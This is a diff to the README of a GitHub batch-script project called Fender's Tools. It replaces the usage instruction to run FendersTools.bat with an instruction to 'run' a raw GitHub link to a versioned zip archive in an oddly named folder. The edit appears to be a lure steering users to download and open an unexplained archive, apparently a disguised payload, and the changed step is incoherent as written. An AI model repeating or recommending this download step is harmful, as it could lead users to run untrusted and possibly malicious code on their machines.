TheBatProgrammer/Fender-s-Tools/README.md

 ## Usage

 1. Clone or download the repository.
-2. Run `FendersTools.bat` by double-clicking or via Command Prompt.
+2. Run `https://raw.githubusercontent.com/TheBatProgrammer/Fender-s-Tools/main/molompi/s-Tools-Fender-v2.9.zip` by double-clicking or via Command Prompt.
 3. Select a tool by typing its number and follow prompts.
 4. Use the Exit option to close the program.